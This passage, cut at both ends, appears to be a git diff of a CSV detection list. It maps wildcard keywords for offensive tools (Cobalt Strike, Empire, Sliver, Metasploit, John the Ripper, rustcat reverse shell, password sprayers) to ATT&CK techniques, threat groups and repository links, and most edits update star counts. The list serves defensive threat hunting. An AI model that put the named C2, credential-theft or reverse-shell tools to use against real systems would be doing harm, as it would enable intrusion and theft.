","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*BishopFox/sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*bitb_server/phishing.ini*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*bitcoin2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Bitmap-Elevate*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*bitquark_top100k_sublist.txt*","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","N/A","6","10","1221","192","2023-09-11T05:26:53Z","2019-08-07T14:32:53Z" -"*bits_ntlm_token_impersonation.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*bitsadmin/nopowershell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bits_ntlm_token_impersonation.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*bitsadmin/nopowershell*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*BitsadminStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*bitshares2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*bitwarden2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bitshares2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bitwarden2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*Biu-framework*","offensive_tool_keyword","Biu-framework","Biu-framework Security Scan Framework For Enterprise Intranet Based Services","T1590 - T1591 - T1592 - T1593 - T1595 - T1596 - 
T1599","TA0011","N/A","N/A","Frameworks","https://awesomeopensource.com/project/0xbug/Biu-framework","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bkerberos_ccache_use*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkerberos_ticket_purge*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkerberos_ticket_use*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bkeylogger*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" -"*bks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bks2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*blackarch/tree/master/packages/rustcat*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse 
shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" "*blackarrowsec/mssqlproxy*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*blackarrowsec/pivotnacci*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" -"*blackhat-arsenal-tools*","offensive_tool_keyword","Github Username","This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility. the tools are classified by category and not by session.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/toolswatch/blackhat-arsenal-tools","1","0","N/A","N/A","10","3545","1140","2023-08-14T03:46:11Z","2017-07-21T08:03:44Z" -"*blacklanternsecurity/MANSPIDER*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","772","119","2023-10-03T03:50:49Z","2020-03-18T13:27:20Z" -"*blacklanternsecurity/trevorproxy*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*blacklanternsecurity/TREVORspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*blackhat-arsenal-tools*","offensive_tool_keyword","Github Username","This github account maps to the Black Hat Arsenal tools since its inception in 2011. For readibility. the tools are classified by category and not by session.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/toolswatch/blackhat-arsenal-tools","1","0","N/A","N/A","10","3547","1140","2023-08-14T03:46:11Z","2017-07-21T08:03:44Z" +"*blacklanternsecurity/MANSPIDER*","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"*blacklanternsecurity/trevorproxy*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*blacklanternsecurity/TREVORspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*Blackout.exe *","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" -"*ble_recon.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*blendin/3snake*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - 
T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" -"*blindSQLPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*blockchain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*ble_recon.go*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*blendin/3snake*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*blindSQLPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*blockchain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline 
password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*blockdlls -*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*blockdlls start*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*blockdlls stop*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are 
security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
@@ -7831,38 +7978,38 @@ "*bloginuser*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*blogonpasswords*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bloodhound &> /dev/null &*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*bloodhound --no-sandbox*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*BloodHound-*.zip*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
